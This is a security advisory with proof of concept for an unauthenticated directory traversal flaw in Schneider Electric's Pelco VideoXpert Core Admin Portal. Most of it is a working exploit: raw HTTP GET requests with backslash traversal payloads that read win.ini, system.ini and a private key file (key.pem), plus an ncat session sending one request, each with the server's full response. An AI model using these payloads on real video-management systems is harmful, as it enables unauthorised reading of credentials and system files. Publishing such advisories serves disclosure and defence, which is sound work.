Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
dfa0df3c855819b71c9869725eccb056
Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
1.14.7
1.12.105
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
Exploiting this issue will allow an unauthenticated attacker to
view arbitrary files within the context of the web server.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Jetty(9.2.6.v20141205)
MongoDB/3.2.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5419
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
05.04.2017
--
PoC:
----
GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP/1.1 200 OK
Date: Wed, 05 Apr 2017 13:27:39 GMT
Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
ETag: 1247548162000
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
------
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 11:59:07 GMT
Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1491397116000
Content-Length: 9
Connection: close
T0ps3cret
------
bash-4.4$ cat pelco_system_ini.txt
GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
Host: 172.19.0.198
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to 172.19.0.198:80.
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2017 12:30:01 GMT
Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=UTF-8
ETag: 1244668084000
Content-Length: 219
Connection: close
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
bash-4.4$